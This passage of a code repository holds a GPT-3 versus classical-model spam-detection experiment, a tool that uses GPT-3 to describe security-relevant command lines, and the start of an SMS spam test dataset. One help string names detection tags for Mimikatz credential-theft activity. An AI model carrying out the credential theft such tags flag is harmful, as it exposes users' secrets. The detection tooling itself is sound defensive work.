| :param path_results_output: path for outputs 115 | :param model_name: model name 116 | :param path_data_folder: path for data 117 | :param train_sample_size_list: a list of train sample sizes 118 | :param data_type: data type 119 | :param column_text: the column for text data 120 | :param column_label: the column for label data 121 | :param positive_label: the positive label value 122 | :param negative_label: the negative label value 123 | :param fine_tune: True to fine_tune 124 | :param fine_tuned_model: fine_tuned model name 125 | :param fine_tune_context_sample_size: the sample size for fine-tunning prompt data 126 | :param prompt_context_sample_size=3: the sample size for context prompt 127 | :param sleep_time: sleep time in seconds 128 | """ 129 | logger.info("evaluate_model_with_train_sample_sizes:{}".format(locals())) 130 | 131 | f1_score_list = [] 132 | for train_sample_size in train_sample_size_list: 133 | if train_sample_size > 0: 134 | path_train_data = os.path.join( 135 | path_data_folder, "train_{}.csv".format(train_sample_size)) 136 | else: 137 | path_train_data = os.path.join(path_data_folder, "train.csv") 138 | path_test_data = os.path.join(path_data_folder, "test.csv") 139 | 140 | if model_name in ["RandomForest", "LogisticRegression"]: 141 | report_test = evaluate_sklearn_model( 142 | path_train_data=path_train_data, 143 | path_test_data=path_test_data, 144 | model_name=model_name, 145 | max_features=MAX_SKLEARN_ML_FEATURES, 146 | column_text=column_text, 147 | column_label=column_label, 148 | positive_label=positive_label 149 | ) 150 | else: 151 | report_test = evaluate_gpt3_model( 152 | path_train_data, 153 | path_test_data=path_test_data, 154 | model_name=model_name, 155 | data_type=data_type, 156 | column_text=column_text, 157 | column_label=column_label, 158 | positive_label=positive_label, 159 | negative_label=negative_label, 160 | fine_tune=fine_tune, 161 | fine_tuned_model=fine_tuned_model, 162 | fine_tune_context_sample_size=fine_tune_context_sample_size, 163 | prompt_context_sample_size=prompt_context_sample_size, 164 | sleep_time=sleep_time 165 | ) 166 | 167 | if report_test is not None: 168 | test_f1_score = report_test["weighted avg"]["f1-score"] 169 | report_item = {"train_size": train_sample_size} 170 | report_item.update( 171 | {"test_"+k: v for k, v in report_test["weighted avg"].items()}) 172 | f1_score_list.append(report_item) 173 | 174 | logger.info("model_name:{}, train_size:{}, test_f1_score:{}".format( 175 | model_name, train_sample_size, test_f1_score)) 176 | 177 | #store the f1 scores 178 | df = pd.DataFrame(f1_score_list) 179 | df.to_csv(path_results_output, index=False) 180 | 181 | 182 | def plot_f1_results( 183 | plot_item_list=[("RandomForest", "orange", "o" ,"../**/results_randomforest.csv")], 184 | path_output="result_f1_plot.pdf" 185 | ): 186 | """ 187 | plot f1 results. 188 | :param plot_item_list: a list of plot data items 189 | :param path_output: file path for output image 190 | """ 191 | pyplot.clf() 192 | 193 | for label, color, marker, path_pattern in plot_item_list: 194 | f1_list=[] 195 | for path_file in glob.glob(path_pattern, recursive=1): 196 | df = pd.read_csv(path_file) 197 | f1_list.append(df["test_f1-score"]) 198 | if len(f1_list) == 0: 199 | continue 200 | x = [str(size) for size in df["train_size"]] 201 | 202 | f1_list = np.array(f1_list) 203 | #the mean f1 values 204 | f1_mean = np.mean(f1_list, axis=0) 205 | #the std f1 values 206 | f1_std = np.std(f1_list, axis=0) 207 | f1_upper = f1_mean + f1_std 208 | f1_lower = f1_mean - f1_std 209 | 210 | pyplot.plot(x, f1_mean, marker=marker, color=color, label=label) 211 | pyplot.fill_between(x, f1_lower, f1_upper, color=color, alpha=.2) 212 | 213 | pyplot.grid() 214 | pyplot.ylabel("F1-score") 215 | pyplot.xlabel("Training sample size") 216 | pyplot.legend(loc="lower right") 217 | pyplot.savefig(path_output) 218 | 219 | 220 | def run_experiments(path_data_folder="spam_data"): 221 | """ 222 | run experiments with data sets in the data folder. 223 | :param path_data_folder: folder for the data sets 224 | """ 225 | # generate train and test datasets. 226 | generate_datasets( 227 | path_output_folder=path_data_folder, 228 | path_input_tsv_file=os.path.join( 229 | path_data_folder, "SMSSpamCollection"), 230 | column_text="text", 231 | column_label="label", 232 | positive_label="Spam", 233 | #the sample size list for training datasets should be sorted in descending order. 234 | train_sample_size_list=[1024, 512, 32, 8, 2], 235 | test_sample_size=256 236 | ) 237 | 238 | # evaluate RandomForest model 239 | path_results_randomforest = os.path.join( 240 | path_data_folder, "results_randomforest.csv") 241 | evaluate_model_with_train_sample_sizes( 242 | path_results_output=path_results_randomforest, 243 | model_name="RandomForest", 244 | path_data_folder=path_data_folder, 245 | #the sample size list for evaluation should be sorted in ascending order. 246 | train_sample_size_list=[2, 8, 32, 512, 1024] 247 | ) 248 | 249 | # evaluate LogisticRegression model 250 | path_results_logisticregression = os.path.join( 251 | path_data_folder, "results_logisticregression.csv") 252 | evaluate_model_with_train_sample_sizes( 253 | path_results_output=path_results_logisticregression, 254 | model_name="LogisticRegression", 255 | path_data_folder=path_data_folder, 256 | train_sample_size_list=[2, 8, 32, 512, 1024] 257 | ) 258 | 259 | # evaluate GPT-3 few-shot model with few samples of [2, 8, 32] 260 | path_results_gpt3_fewshot = os.path.join( 261 | path_data_folder, "results_gpt3_fewshot.csv") 262 | evaluate_model_with_train_sample_sizes( 263 | path_results_output=path_results_gpt3_fewshot, 264 | model_name="text-davinci-002", 265 | path_data_folder=path_data_folder, 266 | train_sample_size_list=[2, 8, 32], 267 | fine_tune=False 268 | ) 269 | 270 | # # evaluate GPT-3 fine-tuning model with a few samples of [512, 1024] 271 | path_results_gpt3_finetune = os.path.join( 272 | path_data_folder, "results_gpt3_finetune.csv") 273 | evaluate_model_with_train_sample_sizes( 274 | path_results_output=path_results_gpt3_finetune, 275 | model_name="davinci", 276 | path_data_folder=path_data_folder, 277 | train_sample_size_list=[512, 1024], 278 | fine_tune=True 279 | ) 280 | 281 | #plot f1 results 282 | plot_items = [ 283 | #(label, color, mark, path_pattern) 284 | ("GPT3_Fewshot", "blue", "*", path_results_gpt3_fewshot), 285 | ("GPT3_Finetune", "red", "*", path_results_gpt3_finetune), 286 | ("RandomForest", "orange", "o", path_results_randomforest), 287 | ("LogisticRegression", "green", "v", path_results_logisticregression) 288 | ] 289 | plot_f1_results(plot_items, path_output=os.path.join(path_data_folder, "results_f1_plot.pdf")) 290 | 291 | 292 | if __name__ == "__main__": 293 | parser = argparse.ArgumentParser(description="Spam detection") 294 | parser.add_argument( 295 | "--run_type", 296 | help="classify_message or evaluate_approaches", 297 | default="classify_message" 298 | ) 299 | parser.add_argument( 300 | "--message", 301 | help="message to be classified", 302 | default="" 303 | ) 304 | parser.add_argument( 305 | "--path_train_data", 306 | help="file path for training samples", 307 | default="spam_data/experiment_1/train_2.csv" 308 | ) 309 | 310 | parser.add_argument( 311 | "--path_data_folder", 312 | help="file folder for data", 313 | default="spam_data" 314 | ) 315 | parser.add_argument( 316 | "--num_experiments", 317 | type=int, 318 | help="number of experiments", 319 | default=5 320 | ) 321 | args = parser.parse_args() 322 | 323 | if args.run_type == "classify_message": 324 | classify_message( 325 | message=args.message, 326 | path_train_data=args.path_train_data 327 | ) 328 | else: 329 | #run experiments 330 | for ix in range(1, args.num_experiments+1): 331 | path_data_folder = os.path.join(args.path_data_folder, "experiment_{}".format(ix)) 332 | logger.info("==== experiment_{}, path_data_folder:{}".format(ix, path_data_folder)) 333 | os.makedirs(path_data_folder, exist_ok=True) 334 | path_src_data = os.path.join(args.path_data_folder, "SMSSpamCollection") 335 | path_dest_data = os.path.join(path_data_folder, "SMSSpamCollection") 336 | shutil.copyfile(path_src_data, path_dest_data) 337 | run_experiments(path_data_folder=path_data_folder) 338 | 339 | #plot mean f1 with all experiment results. 340 | plot_items = [ 341 | #(label, color, marker, path_pattern) 342 | ("GPT3_Fewshot", "blue", "*", os.path.join(args.path_data_folder, "**", "results_gpt3_fewshot.csv")), 343 | ("GPT3_Finetune", "red", "*", os.path.join(args.path_data_folder, "**", "results_gpt3_finetune.csv")), 344 | ("RandomForest", "orange", "o", os.path.join(args.path_data_folder, "**", "results_randomforest.csv")), 345 | ("LogisticRegression", "green", "v", os.path.join(args.path_data_folder, "**", "results_logisticregression.csv")) 346 | ] 347 | plot_f1_results(plot_items, path_output=os.path.join(args.path_data_folder, "results_mean_f1_plot.pdf")) 348 | -------------------------------------------------------------------------------- /command_analyzer/command_analyzer.py: -------------------------------------------------------------------------------- 1 | import json 2 | import pandas as pd 3 | import argparse 4 | import logging 5 | 6 | from prompt_data import get_prompt_for_desc_from_cmd_tag 7 | from prompt_data import get_prompt_for_cmd_from_tag_desc 8 | from prompt_data import get_prompt_for_combined_desc 9 | from prompt_data import preprocess_tags_str 10 | from prompt_data import generate_text_list_with_prompt 11 | from similarity import get_sorted_similarity_score_list 12 | from similarity import get_ngrams_bleu_similarity_score 13 | from similarity import get_semantic_similarity_score 14 | 15 | 16 | logging.basicConfig(format="%(asctime)s %(message)s", 17 | datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO) 18 | logger = logging.getLogger(__name__) 19 | 20 | 21 | MAX_CMD_LEN = 200 22 | 23 | ENGINE_CMD2DESC = "code-davinci-002" 24 | ENGINE_DESC2CMD = "code-davinci-002" 25 | ENGINE_COMBINE_DESC = "text-davinci-002" 26 | ENGINE_EMBEDDINGS = "text-similarity-babbage-001" 27 | 28 | ENGINE_TEMPERATURE = 0.7 29 | 30 | 31 | def generate_desc_list_from_cmd_tag( 32 | cmd, 33 | tags, 34 | include_tag=True, 35 | include_prefix=False, 36 | engine=ENGINE_CMD2DESC, 37 | temperature=0.7, 38 | n=5, 39 | max_cmd_len=MAX_CMD_LEN 40 | ): 41 | """ 42 | generates a list of descriptions from the command and tag info. 43 | :param cmd: command line data 44 | :param tags: "," seperated tags data 45 | :param include_tag: True to include tags in prompt 46 | :param include_prefix: True to include support examples in prompt 47 | :param engine: openai engine 48 | :param temperature: temperature to control randomness of engine 49 | :param n: number of engine outputs 50 | :param max_cmd_len: max data length for command line data 51 | """ 52 | prompt = get_prompt_for_desc_from_cmd_tag( 53 | cmd, tags, max_cmd_len=max_cmd_len, 54 | include_tag=include_tag, include_prefix=include_prefix) 55 | desc_list = generate_text_list_with_prompt( 56 | prompt, engine=engine, temperature=temperature, n=n) 57 | return desc_list 58 | 59 | 60 | def generate_cmd_list_from_tag_desc( 61 | cmd, 62 | tags, 63 | desc, 64 | include_tag=True, 65 | include_prefix=False, 66 | engine=ENGINE_DESC2CMD, 67 | temperature=0.7, 68 | n=1, 69 | max_cmd_len=MAX_CMD_LEN 70 | ): 71 | """ 72 | generates a list of command lines from the description and tag info. 73 | :param cmd: command line data 74 | :param tags: "," seperated tags data 75 | :param desc: description for the command line 76 | :param include_tag: True to include tags in prompt 77 | :param include_prefix: True to include support examples in prompt 78 | :param engine: openai engine 79 | :param temperature: temperature to control randomness of engine 80 | :param n: number of engine outputs 81 | :param max_cmd_len: max data length for command line data 82 | """ 83 | first_token_as_cmd = cmd.split()[0] 84 | prompt = get_prompt_for_cmd_from_tag_desc( 85 | tags, desc, first_token_as_cmd, max_cmd_len=max_cmd_len, 86 | include_tag=include_tag, include_prefix=include_prefix) 87 | cmd_list = generate_text_list_with_prompt( 88 | prompt, engine=engine, temperature=temperature, n=n) 89 | return cmd_list 90 | 91 | 92 | def generate_combined_desc_from_cmd_desc( 93 | cmd, 94 | desc1, 95 | desc2, 96 | engine=ENGINE_COMBINE_DESC, 97 | temperature=0.7, 98 | max_cmd_len=MAX_CMD_LEN 99 | ): 100 | """ 101 | generates a combined descriptin from two descriptions. 102 | :param cmd: command line data 103 | :param desc1: the first description 104 | :param desc2: the second description 105 | :param engine: openai engine 106 | :param temperature: temperature to control randomness of engine 107 | :param max_cmd_len: max data length for command line data 108 | """ 109 | prompt = get_prompt_for_combined_desc( 110 | cmd, desc1, desc2, max_cmd_len=max_cmd_len) 111 | desc = generate_text_list_with_prompt( 112 | prompt, engine=engine, temperature=temperature, n=1)[0] 113 | return desc 114 | 115 | 116 | def generate_sorted_desc_list_from_cmd_tag( 117 | cmd, 118 | tags, 119 | include_tag=True, 120 | include_prefix=False, 121 | weight_desc_score=.0, 122 | weight_tags_score=.0, 123 | desc_size=5, 124 | cmd_size=1, 125 | engine_cmd2desc=ENGINE_CMD2DESC, 126 | engine_desc2cmd=ENGINE_DESC2CMD, 127 | engine_embeddings=ENGINE_EMBEDDINGS, 128 | temperature=ENGINE_TEMPERATURE, 129 | max_cmd_len=MAX_CMD_LEN 130 | ): 131 | """ 132 | generates a list of descriptions sorted by similarity scores. 133 | step1. generate a list of descs from cmd and tags 134 | step2. generate a list of cmds from tags and desc 135 | step3. sort descs by similarity scores 136 | 137 | :param cmd: command line data 138 | :param tags: "," seperated tags data 139 | :param include_tag: True to include tags in prompt 140 | :param include_prefix: True to include support examples in prompt 141 | :param weight_desc_score: the weight for description score 142 | :param weight_tags_score: the weight for tags score 143 | :param desc_size: the number of output descriptions 144 | :param cmd_size: the number of output command lines 145 | :param engine_cmd2desc: the engine for command to description 146 | :param engine_desc2cmd: the engine for description to command 147 | :param engine_embeddings: the engine for text embeddings 148 | :param temperature: temperature to control randomness of engine 149 | :param max_cmd_len: max data length for command line data 150 | """ 151 | tags = preprocess_tags_str(tags) 152 | logger.info(f"tags={tags}") 153 | 154 | desc_list = generate_desc_list_from_cmd_tag( 155 | cmd, tags, include_tag=include_tag, include_prefix=include_prefix, 156 | engine=engine_cmd2desc, temperature=temperature, 157 | n=desc_size, max_cmd_len=max_cmd_len) 158 | if len(desc_list) == 0: 159 | return [] 160 | baseline_description = desc_list[0] 161 | 162 | cmd_first_token = cmd.split()[0] 163 | desc_cmd_list = [] 164 | for desc in desc_list: 165 | generated_cmd = generate_cmd_list_from_tag_desc( 166 | cmd, tags, desc, include_tag=include_tag, 167 | include_prefix=include_prefix, n=cmd_size, 168 | engine=engine_desc2cmd, temperature=temperature, 169 | max_cmd_len=max_cmd_len)[0] 170 | #append the cmd_first_token + the first generated text 171 | generated_cmd = cmd_first_token + generated_cmd 172 | desc_cmd_list.append((desc, generated_cmd)) 173 | desc_cmd_list = get_sorted_similarity_score_list( 174 | cmd, tags, 175 | desc_cmd_list, engine=engine_embeddings, 176 | weight_desc_score=weight_desc_score, 177 | weight_tags_score=weight_tags_score, max_cmd_len=max_cmd_len) 178 | return desc_cmd_list, baseline_description 179 | 180 | 181 | def generate_descriptions_from_cmd_tags( 182 | cmd, 183 | tags=None, 184 | n=2, 185 | combine_descriptions=True, 186 | engine_cmd2desc=ENGINE_CMD2DESC, 187 | engine_desc2cmd=ENGINE_DESC2CMD, 188 | engine_embeddings=ENGINE_EMBEDDINGS, 189 | engine_combine_desc=ENGINE_COMBINE_DESC, 190 | temperature=ENGINE_TEMPERATURE, 191 | max_cmd_len=MAX_CMD_LEN 192 | ): 193 | """ 194 | generates a combined descripotion from a list of descriptions. 195 | :param cmd: command line data 196 | :param tags: "," seperated tags data 197 | :param n: the number of output descriptions 198 | :param combine_descriptions: True to combine two descriptions 199 | :param engine_cmd2desc: the engine for command to description 200 | :param engine_desc2cmd: the engine for description to command 201 | :param engine_embeddings: the engine for text embeddings 202 | :param temperature: temperature to control randomness of engine 203 | :param max_cmd_len: max data length for command line data 204 | """ 205 | logger.info("generate_descriptions_from_cmd_tags:{}".format(locals())) 206 | 207 | if tags: 208 | include_tag = 1 209 | weight_desc_score=0.3 210 | weight_tags_score=0.2 211 | else: 212 | include_tag = 0 213 | weight_desc_score=0.5 214 | weight_tags_score=0.0 215 | 216 | desc_cmd_items, baseline_description = generate_sorted_desc_list_from_cmd_tag( 217 | cmd, tags, include_tag=include_tag, include_prefix=1, 218 | weight_desc_score=weight_desc_score, weight_tags_score=weight_tags_score, 219 | desc_size=5, cmd_size=1, 220 | engine_cmd2desc=engine_cmd2desc, engine_desc2cmd=engine_desc2cmd, 221 | engine_embeddings=engine_embeddings, temperature=temperature, 222 | max_cmd_len=max_cmd_len) 223 | 224 | baseline_description = "The command" + baseline_description 225 | 226 | best_candidates = [] 227 | first_desc, second_desc = '', '' 228 | for ix,item in enumerate(desc_cmd_items[:n]): 229 | score, _score_code, _score_desc, _score_tags, cmd, generated_cmd, desc = item[:] 230 | candidate_data = {"score":score, "desc":desc, "generated_cmd":generated_cmd} 231 | if ix == 0: 232 | first_desc = desc 233 | else: 234 | second_desc = desc 235 | logger.info(candidate_data) 236 | best_candidates.append(candidate_data) 237 | 238 | if first_desc and second_desc: 239 | if combine_descriptions: 240 | combined_desc = generate_combined_desc_from_cmd_desc( 241 | cmd, first_desc, second_desc, 242 | engine=engine_combine_desc, temperature=temperature, 243 | max_cmd_len=max_cmd_len) 244 | description = "The command" + combined_desc 245 | else: 246 | description = "The command" + first_desc 247 | else: 248 | description = "The command" + first_desc 249 | logger.info("\n"+description+"\n") 250 | 251 | return description, baseline_description, best_candidates 252 | 253 | 254 | def generate_description( 255 | cmd, 256 | tags=None, 257 | combine_descriptions=True, 258 | engine_cmd2desc=ENGINE_CMD2DESC, 259 | engine_desc2cmd=ENGINE_DESC2CMD, 260 | temperature=ENGINE_TEMPERATURE 261 | ): 262 | """ 263 | generates a description from a command line and tag info. 264 | :param cmd: command line data 265 | :param tags: "," seperated tags data 266 | :param combine_descriptions: True to combine two descriptions 267 | :param engine_cmd2desc: the engine for command to description 268 | :param engine_desc2cmd: the engine for description to command 269 | :param temperature: temperature to control randomness of engine 270 | """ 271 | description, baseline_description, best_candidates = generate_descriptions_from_cmd_tags( 272 | cmd, tags=tags, n=2, 273 | combine_descriptions=combine_descriptions, 274 | engine_cmd2desc=engine_cmd2desc, engine_desc2cmd=engine_desc2cmd, 275 | temperature=temperature 276 | ) 277 | 278 | logger.info("cmd:\n{}".format(cmd)) 279 | logger.info("tags:\n{}".format(tags)) 280 | logger.info("description:\n{}".format(description)) 281 | logger.info("baseline_description:\n{}".format(baseline_description)) 282 | logger.info("back-translated_cmd:\n{}".format(best_candidates[0]["generated_cmd"])) 283 | return description, baseline_description, best_candidates 284 | 285 | 286 | def evaluate_approaches( 287 | path_output_json, 288 | path_input_json, 289 | engine_cmd2desc=ENGINE_CMD2DESC, 290 | engine_desc2cmd=ENGINE_DESC2CMD, 291 | temperature=ENGINE_TEMPERATURE, 292 | combine_descriptions=True, 293 | offset=0, 294 | limit=0 295 | ): 296 | """ 297 | evaluates baseline and back-translation approaches using a test dataset. 298 | :param path_output_json: file path for input data 299 | :param path_input_json: file path for output data 300 | :param cmd: command line data 301 | :param tags: "," seperated tags data 302 | :param engine_cmd2desc: the engine for command to description 303 | :param engine_desc2cmd: the engine for description to command 304 | :param temperature: temperature to control randomness of engine 305 | :param combine_descriptions: True to combine two descriptions 306 | :param offset: the offset of input data for partial testing 307 | :param limit: the limit of input data for partial testing 308 | """ 309 | logger.info("evaluate_approaches:{}".format(locals())) 310 | 311 | with open(path_input_json) as fr: 312 | items = json.load(fr) 313 | 314 | if offset>0: 315 | items = items[offset:] 316 | if limit>0: 317 | items = items[:limit] 318 | logger.info("number of items in input file:{}".format(len(items))) 319 | 320 | results = [] 321 | for ix, item in enumerate(items): 322 | logger.info("======== {}".format(ix)) 323 | 324 | cmd = item["cmd"] 325 | tags = item["tags"] 326 | gold_description = item["gold_reference_description"] 327 | 328 | generated_description, baseline_description, _best_candidates = generate_description( 329 | cmd, 330 | tags=tags, 331 | combine_descriptions=combine_descriptions, 332 | engine_cmd2desc=engine_cmd2desc, 333 | engine_desc2cmd=engine_desc2cmd, 334 | temperature=temperature 335 | ) 336 | 337 | item["generated_description"] = generated_description 338 | item["baseline_description"] = baseline_description 339 | 340 | candidate_list = [generated_description, baseline_description] 341 | 342 | ngram_bleu_scores = get_ngrams_bleu_similarity_score(gold_description, candidate_list) 343 | #ngram_bleu_scores_list.append(ngram_bleu_scores) 344 | item["ngram_bleu_scores"] = { 345 | "generated_description_score":ngram_bleu_scores[0], "baseline_description_score":ngram_bleu_scores[1] 346 | } 347 | 348 | semantic_similarity_scores = get_semantic_similarity_score(gold_description, candidate_list, engine=ENGINE_EMBEDDINGS) 349 | #semantic_similarity_scores_list.append(semantic_similarity_scores) 350 | item["semantic_similarity_scores"] = { 351 | "generated_description_score":semantic_similarity_scores[0], "baseline_description_score":semantic_similarity_scores[1] 352 | } 353 | 354 | results.append(item) 355 | 356 | logger.info("cmd:{}".format(cmd)) 357 | logger.info("tags:{}".format(tags)) 358 | logger.info("gold_description:{}".format(gold_description)) 359 | logger.info("generated_description:{}".format(generated_description)) 360 | logger.info("baseline_description:{}".format(baseline_description)) 361 | 362 | logger.info("ngram_bleu_scores:{}".format(ngram_bleu_scores)) 363 | logger.info("semantic_similarity_scores:{}".format(semantic_similarity_scores)) 364 | 365 | #save the outputs 366 | with open(path_output_json, "wt") as fw: 367 | json.dump(results, fw, indent=2) 368 | 369 | #store the mean and std values for similarity scores 370 | df_bleu = pd.DataFrame([item["ngram_bleu_scores"] for item in results]).add_prefix("ngram_bleu_") 371 | df_semantic = pd.DataFrame([item["semantic_similarity_scores"] for item in results]).add_prefix("semantic_similarity_") 372 | df = df_bleu.join(df_semantic) 373 | df_mean_std = df.agg(["mean", "std"]) 374 | logger.info("df_mean_std:{}".format(df_mean_std)) 375 | path_output_score_csv = path_output_json + "_scores.csv" 376 | df_mean_std.to_csv(path_output_score_csv) 377 | 378 | return results 379 | 380 | 381 | if __name__ == "__main__": 382 | parser = argparse.ArgumentParser(description="Command to description") 383 | 384 | parser.add_argument( 385 | "--run_type", 386 | help="generate_desc or evaluate_approaches", 387 | default="generate_desc" 388 | ) 389 | parser.add_argument( 390 | "--cmd", 391 | help="command line data", 392 | ) 393 | parser.add_argument( 394 | "--tags", 395 | help="',' seperated tags for example, win_mimikatz_command_line,win_suspicious_execution_path ", 396 | default="" 397 | ) 398 | parser.add_argument( 399 | "--combine_descriptions", 400 | action="store_true", 401 | dest="combine_descriptions", 402 | help="to combine two descriptions as the final description", 403 | default=True 404 | ) 405 | parser.add_argument( 406 | "--no_combine_descriptions", 407 | action="store_false", 408 | dest="combine_descriptions", 409 | help="not to combine two descriptions as the final description", 410 | default=False 411 | ) 412 | 413 | parser.add_argument( 414 | "--engine_cmd2desc", 415 | help="gpt3 model for command to description", 416 | default=ENGINE_CMD2DESC 417 | ) 418 | parser.add_argument( 419 | "--engine_desc2cmd", 420 | help="gpt3 model for description to command", 421 | default=ENGINE_DESC2CMD 422 | ) 423 | parser.add_argument( 424 | "--temperature", 425 | type=float, 426 | help="temperature ", 427 | default=ENGINE_TEMPERATURE 428 | ) 429 | 430 | parser.add_argument( 431 | "--path_output_json", 432 | help="path for output json file", 433 | ) 434 | parser.add_argument( 435 | "--path_input_json", 436 | help="path for input json file", 437 | ) 438 | parser.add_argument( 439 | "--offset", 440 | type=int, 441 | help="path for input json file", 442 | default=0 443 | ) 444 | parser.add_argument( 445 | "--limit", 446 | type=int, 447 | help="path for input json file", 448 | default=0 449 | ) 450 | 451 | args = parser.parse_args() 452 | if args.run_type == "generate_desc": 453 | generate_description( 454 | args.cmd, 455 | args.tags, 456 | args.combine_descriptions, 457 | engine_cmd2desc=args.engine_cmd2desc, 458 | engine_desc2cmd=args.engine_desc2cmd 459 | ) 460 | else: 461 | evaluate_approaches( 462 | args.path_output_json, 463 | args.path_input_json, 464 | engine_cmd2desc=args.engine_cmd2desc, 465 | engine_desc2cmd=args.engine_desc2cmd, 466 | temperature=args.temperature, 467 | combine_descriptions=args.combine_descriptions, 468 | offset=args.offset, 469 | limit=args.limit 470 | ) 471 | -------------------------------------------------------------------------------- /spam_detector/spam_data/experiment_1/test.csv: -------------------------------------------------------------------------------- 1 | label text 2 | Ham LMAO where's your fish memory when I need it? 3 | Ham Got meh... When? 4 | Ham You should change your fb to jaykwon thuglyfe falconerf 5 | Ham Not sure yet, still trying to get a hold of him 6 | Ham Chk in ur belovd ms dict 7 | Ham Aight I'll grab something to eat too, text me when you're back at mu 8 | Ham Give me a sec to think think about it 9 | Ham Maybe you should find something else to do instead??? 10 | Ham She.s good. She was wondering if you wont say hi but she.s smiling now. So how are you coping with the long distance 11 | Ham I am thinking of going down to reg for pract lessons.. Flung my advance.. Haha wat time u going? 12 | Ham What Today-sunday..sunday is holiday..so no work.. 13 | Ham Fuck babe, I miss you sooooo much !! I wish you were here to sleep with me ... My bed is so lonely ... I go now, to sleep ... To dream of you, my love ... 14 | Spam Free entry in 2 a wkly comp to win FA Cup final tkts 21st May 2005. Text FA to 87121 to receive entry question(std txt rate)T&C's apply 08452810075over18's 15 | Ham Kay... Since we are out already 16 | Ham hows my favourite person today? r u workin hard? couldn't sleep again last nite nearly rang u at 4.30 17 | Ham Yeh. Indians was nice. Tho it did kane me off a bit he he. We shud go out 4 a drink sometime soon. Mite hav 2 go 2 da works 4 a laugh soon. Love Pete x x 18 | Ham I want <#> rs da:)do you have it? 19 | Ham No, but you told me you were going, before you got drunk! 20 | Ham It's cool, let me know before it kicks off around <#> , I'll be out and about all day 21 | Ham When you just put in the + sign, choose my number and the pin will show. Right? 22 | Ham Lol u still feeling sick? 23 | Spam 22 days to kick off! For Euro2004 U will be kept up to date with the latest news and results daily. To be removed send GET TXT STOP to 83222 24 | Ham HIYA STU WOT U UP 2.IM IN SO MUCH TRUBLE AT HOME AT MOMENT EVONE HATES ME EVEN U! WOT THE HELL AV I DONE NOW? Y WONT U JUST TELL ME TEXT BCK PLEASE LUV DAN 25 | Ham I wanna watch that movie 26 | Ham You will be in the place of that man 27 | Ham No da. . Vijay going to talk in jaya tv 28 | Ham Whatsup there. Dont u want to sleep 29 | Ham Gud mrng dear hav a nice day 30 | Ham Yar but they say got some error. 31 | Ham Yup i thk they r e teacher said that will make my face look longer. Darren ask me not 2 cut too short. 32 | Ham Re your call; You didn't see my facebook huh? 33 | Ham You are not bothering me but you have to trust my answers. Pls. 34 | Ham Of cos can lar i'm not so ba dao ok... 1 pm lor... Y u never ask where we go ah... I said u would ask on fri but he said u will ask today... 35 | Ham Yeah, in fact he just asked if we needed anything like an hour ago. When and how much? 36 | Ham Wat r u doing? 37 | Ham Is it your yahoo boys that bring in the perf? Or legal. 38 | Ham He also knows about lunch menu only da. . I know 39 | Ham HEY DAS COOL... IKNOW ALL 2 WELLDA PERIL OF STUDENTFINANCIAL CRISIS!SPK 2 U L8R. 40 | Ham K actually can you guys meet me at the sunoco on howard? It should be right on the way 41 | Ham Nope. Meanwhile she talk say make i greet you. 42 | Ham How's it going? Got any exciting karaoke type activities planned? I'm debating whether to play football this eve. Feeling lazy though. 43 | Ham "Storming msg: Wen u lift d phne, u say ""HELLO"" Do u knw wt is d real meaning of HELLO?? . . . It's d name of a girl..! . . . Yes.. And u knw who is dat girl?? ""Margaret Hello"" She is d girlfrnd f Grah" 44 | Ham Here got ur favorite oyster... N got my favorite sashimi... Ok lar i dun say already... Wait ur stomach start rumbling... 45 | Ham Dear where you. Call me 46 | Spam You have an important customer service announcement. Call FREEPHONE 0800 542 0825 now! 47 | Ham I dont know oh. Hopefully this month. 48 | Ham Yeah if we do have to get a random dude we need to change our info sheets to PARTY <#> /7 NEVER STUDY just to be safe 49 | Spam Babe: U want me dont u baby! Im nasty and have a thing 4 filthyguys. Fancy a rude time with a sexy bitch. How about we go slo n hard! Txt XXX SLO(4msgs) 50 | Ham Hahaha..use your brain dear 51 | Ham I‘ll have a look at the frying pan in case it‘s cheap or a book perhaps. No that‘s silly a frying pan isn‘t likely to be a book 52 | Ham Nt only for driving even for many reasons she is called BBD..thts it chikku, then hw abt dvg cold..heard tht vinobanagar violence hw is the condition..and hw ru ? Any problem? 53 | Ham Hey sathya till now we dint meet not even a single time then how can i saw the situation sathya. 54 | Ham YO YO YO BYATCH WHASSUP? 55 | Ham Tell them u have a headache and just want to use 1 hour of sick time. 56 | Ham I told her I had a Dr appt next week. She thinks I'm gonna die. I told her its just a check. Nothing to be worried about. But she didn't listen. 57 | Ham I know dat feelin had it with Pete! Wuld get with em , nuther place nuther time mayb? 58 | Ham Don‘t give a flying monkeys wot they think and I certainly don‘t mind. Any friend of mine and all that! 59 | Ham Oh all have to come ah? 60 | Ham I want to go to perumbavoor 61 | Ham Fwiw the reason I'm only around when it's time to smoke is that because of gas I can only afford to be around when someone tells me to be and that apparently only happens when somebody wants to light 62 | Ham I calls you later. Afternoon onwords mtnl service get problem in south mumbai. I can hear you but you cann't listen me. 63 | Ham "Storming msg: Wen u lift d phne, u say ""HELLO"" Do u knw wt is d real meaning of HELLO?? . . . It's d name of a girl..! . . . Yes.. And u knw who is dat girl?? ""Margaret Hello"" She is d girlfrnd f Grah" 64 | Ham It's ok, at least armand's still around 65 | Ham Where can download clear movies. Dvd copies. 66 | Ham I'm always looking for an excuse to be in the city. 67 | Ham Nah man, my car is meant to be crammed full of people 68 | Ham Just taste fish curry :-P 69 | Ham Pls give her prometazine syrup. 5mls then <#> mins later feed. 70 | Ham Good afternoon, babe. How goes that day ? Any job prospects yet ? I miss you, my love ... *sighs* ... :-( 71 | Ham Omg how did u know what I ate? 72 | Ham I HAVE A DATE ON SUNDAY WITH WILL!! 73 | Ham cool. We will have fun practicing making babies! 74 | Spam For ur chance to win a £250 wkly shopping spree TXT: SHOP to 80878. T's&C's www.txt-2-shop.com custcare 08715705022, 1x150p/wk 75 | Spam Camera - You are awarded a SiPix Digital Camera! call 09061221066 fromm landline. Delivery within 28 days. 76 | Ham Do u ever get a song stuck in your head for no reason and it won't go away til u listen to it like 5 times? 77 | Ham So how are you really. What are you up to. How's the masters. And so on. 78 | Ham THANX4 TODAY CER IT WAS NICE 2 CATCH UP BUT WE AVE 2 FIND MORE TIME MORE OFTEN OH WELL TAKE CARE C U SOON.C 79 | Ham Nothing. Can... 80 | Ham G wants to know where the fuck you are 81 | Ham I like dis sweater fr mango but no more my size already so irritating. 82 | Ham No b4 Thursday 83 | Ham Anything lor. Juz both of us lor. 84 | Spam Someone U know has asked our dating service 2 contact you! Cant Guess who? CALL 09058091854 NOW all will be revealed. PO BOX385 M6 6WU 85 | Ham I cant pick the phone right now. Pls send a message 86 | Ham She said,'' do u mind if I 